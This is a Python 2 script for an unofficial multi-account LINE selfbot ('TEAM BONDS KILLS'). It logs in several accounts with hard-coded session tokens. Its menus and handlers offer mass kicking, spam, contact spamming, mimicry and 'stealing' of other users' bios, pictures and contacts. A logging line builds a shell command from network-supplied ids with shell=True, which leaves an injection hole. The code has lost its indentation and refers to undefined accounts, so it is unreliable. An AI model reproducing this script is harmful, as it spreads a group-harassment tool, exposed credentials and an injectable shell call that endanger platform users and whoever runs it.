#kk.login(token="EnnlBHTi4QbQKi1Xqla3.TrVjFf5pyd8D+ZxPusvq0W.HDtFuFulskxycJocqYbAK9krFT5ixRMAnrjU3XcDogI=")
#kk.loginResult()
kc = LINETCR.LINE() #Ussop
#kc.login(qr=True)
kc.login(token="En8i8ZAR1hsJLRcqWJB7.7aNdCEtbMUaAO9Hiv0qoTW.WOSasGBkESFnM7P/TCYn6cTcF2U7Lgr396M1Yt/z8qo=")
kc.loginResult()
ks = LINETCR.LINE() #Chooper
#ks.login(qr=True)
ks.login(token="EnrNejwvrgZlyCoYjSdc.SJRuNecAXNC8sHurfor2ha.jD7wclOBbItb9PXfzVA4BhBq5AkfkfdpkQBVbAigijw=")
ks.loginResult()
k1 = LINETCR.LINE() #nami
#k1.login(qr=True)
k1.login(token="EnXJYMPRuZKWp81hPsk2.buJLD7JrrngDnMf5qDfqyG.60g8dV2Qm2DALXdsVgdjfN7PLoRXoNEm9dLRphHFgjM=")
k1.loginResult()
k2 = LINETCR.LINE() #nico robin
#k2.login(qr=True)
k2.login(token="EnGPRLTejNE6mFHDQ2Df.9eQsWmyR4F9AFNPZDyQTtW.N7zwS68J1xmBOk4Z9Fcj2iE+PchLC8MpKvb0TuiKWKU=")
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="En4fEPZ8IBZ2nUUfOpLd.6WqeC+1pukOllkvQ7Oglhq.m7o3gNWWMCJEkoLhAXgymM1CMP6bYkGyBBvplepM+YI=")
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="En2h1tGCsqKy5ZM2j2A2.EX9POTYx+gKdjKz7DQlnSG./5hJc91p8FXQkExd5oGOeB87cra3yuQhmJmTMnhz7oI=")
k4.loginResult()
#k5 = LINETCR.LINE() #
#k5.login(qr=True)
#k5.login(token="Ennz3JizkJJFMKAIPHV2.ZNOnP4uou95euS+Ku1ce4G.V/kc9Cm3euyvm7F3MLq7WLvFzmSoTIJKK3Nohopw9zQ=")
#k5.loginResult()
satpam = LINETCR.LINE() #
satpam.login(token="Ennz3JizkJJFMKAIPHV2.ZNOnP4uou95euS+Ku1ce4G.V/kc9Cm3euyvm7F3MLq7WLvFzmSoTIJKK3Nohopw9zQ=") #satpam
#satpam.login(qr=True)
satpam.loginResult()
print "login success bos"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""TAEM BONDS KILLS✰
Owner : Babang adhi
-----------------------
-=♦·Menu For Public·♦=-
[•]Help
[•]Key
[•]Mimin/Min
[•]Creator
[•]Time
[•]Say....
[•]Wkwkwk/Wkwk/Wk/wkwkwk/wkwk/wk
[•]Hehehe/Hehe/He/hehehe/hehe/he
[•]Galau
[•]You
[•]Hadeuh
[•]Please
[•]Haaa
[•]Lol
[•]Hmmm/Hmm/Hm/hmmm/hmm/hm
[•]Welcome
[•]Woy
[•]wiki
[•]lyric
[•]instagram
[•]music
[•]youtube
[•]Vidio
[•]Bc
[•]Up
[•]Berapa besar cinta
[•]Apakah
[•]Siapakah cewek
[•]Siapakah cowok
[•]Adakah
[•]Cakepkah
[•]T-eng
[•]T-japan
[•]T-thai
[•]T-id
-------=====---------
✰ TEAM BONDS KILLS✰
-------=====---------
"""
Keyowner =""" ✰ TEAM BONDS KILLS ✰
Owner : ✰BABANG ADHI=-
-----=====------------
-=♦·Menu For Owner·=-
[•]Kick ...
[•]Invite (by mid)
[•]Undang (Invite user by kontak)
[•]Adminlist
[•]Bot Add @
[•]Spam... (spam on 10 tes)
[•]Bot? (cek kontak bot)
[•]Cancel (cancel undangan tertunda)
[•]clean invites
[•]clear invites
[•]Message change:...
[•]Message add:...
[•]Message
[•]Comment:...
[•]Add comment:...
[•]Jam on/off
[•]Change clock
[•]Jam Update
[•]Status (cek status room)
[•]Sider
[•]Intip
[•]Ciduk
[•]Nk
[•]Hajar
[•]Vkick
[•]Assalammualaikum/Halo
[•]Kill
[•]Absen/Respon
[•]ifconfig
[•]system
[•]cpu
[•]kernel
[•]Debug speed
[•]Bot speed
[•]Speed respon
[•]Kurangin
[•]Rusakin
[•]Tambah
[•]Spbot
[•]Sp asl
[•]Speedbot
[•]Speed
-------=====-------
✰ TEAM BONDS KILLS ✰
-----====----------
"""
Setgroup =""" -=Team Bonds Killa=-
-==♦·Menu For Admin·♦==-
------=====---------
[•]Cancel
[•]Buka qr/Open qr
[•]link open
[•]Tutup qr/Close qr
[•]link close
[•]Rejectall (reject semua invite)
[•]Protect:hight/low
[•]Auto blockqr:off/on
[•]Namelock:on/off
[•]Blockinvite:on/off
[•]Joinn on/off (kick protect join)
[•]Cancel on/off (cancel semua undangan)
[•]Qr on/off (protect qr)
[•]Contact On/off
[•]Join on/off (auto join bot)
[•]Gcancel:on/off (invite grup)
[•]Leave on/off
[•]Share on/off
[•]Add on/off
[•]Cancelall (canccel all invite)
[•]Comment off/on
[•]Backup:on/off
[•]Info Group
[•]ginfo
[•]Group id
[•]TL:....
[•]Gn
[•]LG
[•]LG2
[•]group list
[•]My mid
[•]Mid Bot
[•]Bot restart
[•]Turn off bots
[•]Allbio: (ganti bio stat bot)
[•]Myname: (ganti nama bot)
[•]Banlist
[•]Cek ban
[•]Kill ban
[•]Blacklist @
[•]Banned @
[•]Mid @"
[•]Unban @
[•]Ban
[•]Unban
[•]Steal group pict
[•]Steal cover @
[•]Midpict:..
[•]Steal pict
[•]Steal bio
[•]Steal mid
[•]Steal contact
[•]Mimic on/off
[•]Targetlist
[•]Mimic target
[•]Target @
[•]Del target @
[•]copy @
[•]Backup
[•]Spamcontact @
[•]GBc
[•]Pm cast
[•]Bot like
[•]Join/Masuk
[•]Bye all
[•]Pulang
[•]Bot pulang
[•]Anu:
[•]Invite me
[•]Remove all chat
[•]Admin add @ (by tag)
[•]Admin remove @
[•]Cleanse
[•]Sikat
[•]Greet
-==Hanya Untuk Owner and Admin==-
Creator by Babang Adhi https://line.me/ti/p/boy29putra
----=====-----------
"""
KAC=[cl,ki,kc,ks,k1,k2,k3,k4]
DEF=[ki,kc,ks,k1,k2,k3,k4]
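# NOTE: the kk (Sanji) and k5 accounts are commented out above, so later
# references to Bmid, Imid, kk and k5 raise NameError at runtime; those
# branches in bot() only survive because they sit inside try/except blocks.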
mid = cl.getProfile().mid
# "uc2e8b426f6591045943eae5304e67c32"
Amid = ki.getProfile().mid
# "uce7a0da7850e53de4452cfe4535084e2"
#Bmid = kk.getProfile().mid
# "ub51bc97c5e4f603f1dff35e9512550d3"
Cmid = kc.getProfile().mid
# "uec09c371e4c19ae01aa3d84857440eb7"
Dmid = ks.getProfile().mid
# "ub23ad49c409ac6773c4a151114e4761c"
Emid = k1.getProfile().mid
# "u0548e577b8d144d19d36617941d15062"
Fmid = k2.getProfile().mid
# "uf44a92c0c62be1ff5a7e7a73758aad4f"
Gmid = k3.getProfile().mid
# "ueb040473fd4f50aa0b2ca56aee818b1d"
Hmid = k4.getProfile().mid
# "u7b1f69a2dc97fc690326467b76a2cdb2"
#Imid = k5.getProfile().mid
# "uce7a0da7850e53de4452cfe4535084e2"
Smid = satpam.getProfile().mid
# "uce7a0da7850e53de4452cfe4535084e2"
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid]
induk=["uc2e8b426f6591045943eae5304e67c32"]
Creator=["uc2e8b426f6591045943eae5304e67c32","uce7a0da7850e53de4452cfe4535084e2"]
admin=["uc2e8b426f6591045943eae5304e67c32"]
owner=["uc2e8b426f6591045943eae5304e67c32","uce7a0da7850e53de4452cfe4535084e2"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"Terima Kasih Sudah Menambahkan Aku kak",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\nBabang-adhi",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"qr":True,
"Backup":False,
"AutoKick":True,
"Mimic":True,
"Protectjoin":False, # Ga Kepake(Yang Gabung langsung di kick :D) Udah Udah ada Protect Cancell
"Protectcancl":True,
"protectionOn":True,
"winvite":False,
"pname":{},
"pro_name":{},
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = kk.getProfile()
#backup = kk.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k1.getProfile()
backup = k1.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k2.getProfile()
backup = k2.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k3.getProfile()
backup = k3.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = k4.getProfile()
backup = k4.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
#contact = k5.getProfile()
#backup = k5.getProfile()
#backup.displayName = contact.displayName
#backup.statusMessage = contact.statusMessage
#backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
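# NOTE: 'album' and 'image_path' are assumed to be defined elsewhere (e.g. as
# module-level globals); they are not set before this helper in the script.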
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
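# mention() and mention2() build LINE "mention-all" messages: every member mid
# in nama gets an "@x " placeholder in the text, and the S/E offsets written
# into the MENTIONEES metadata mark where each placeholder starts and ends.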
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')  # msg is not defined here; use the group id from the operation
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
if op.param2 in Bots:  # 'ken' was undefined; treat bot accounts as exempt from the name-lock kick
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
cl.sendText(op.param1,"please do not change group name-_-")  # kk is commented out above, so send from the main account instead
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?")
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in Creator:
cl.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Creator:
ki.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Creator:
kk.acceptGroupInvitation(op.param1)
if op.param3 in Cmid:
if op.param2 in Creator:
kc.acceptGroupInvitation(op.param1)
if op.param3 in Dmid:
if op.param2 in Creator:
ks.acceptGroupInvitation(op.param1)
if op.param3 in Emid:
if op.param2 in Creator:
k1.acceptGroupInvitation(op.param1)
if op.param3 in Fmid:
if op.param2 in Creator:
k2.acceptGroupInvitation(op.param1)
if op.param3 in Gmid:
if op.param2 in Creator:
k3.acceptGroupInvitation(op.param1)
if op.param3 in Hmid:
if op.param2 in Creator:
k4.acceptGroupInvitation(op.param1)
if op.param3 in Imid:
if op.param2 in Creator:
k5.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
        # If one of the bot accounts (op.param3) was invited by any other bot
        # account (op.param2), the invited bot accepts the invitation itself.
        botPairs = [(mid, cl), (Amid, ki), (Bmid, kk), (Cmid, kc), (Dmid, ks),
                    (Emid, k1), (Fmid, k2), (Gmid, k3), (Hmid, k4), (Imid, k5)]
        for invitedMid, invitedCl in botPairs:
            if op.param3 in invitedMid:
                for inviterMid, _inviterCl in botPairs:
                    if inviterMid != invitedMid and op.param2 in inviterMid:
                        invitedCl.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
                if op.param2 in Bots or op.param2 in admin:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
                if op.param2 in Bots or op.param2 in admin:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
                if op.param2 in Bots or op.param2 in admin:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
                if op.param2 in Bots or op.param2 in admin:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
                if op.param2 in Bots or op.param2 in admin:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
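    # Someone was kicked (op.param2 = kicker, op.param3 = victim). With AutoKick on,
    # the kicker is kicked back and blacklisted, and the victim is invited back in.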
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
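        # If the kicked member is one of the bot accounts, the remaining bots kick the
        # attacker, blacklist them, briefly open the group ticket so every bot can rejoin
        # by ticket, then close the ticket again.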
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
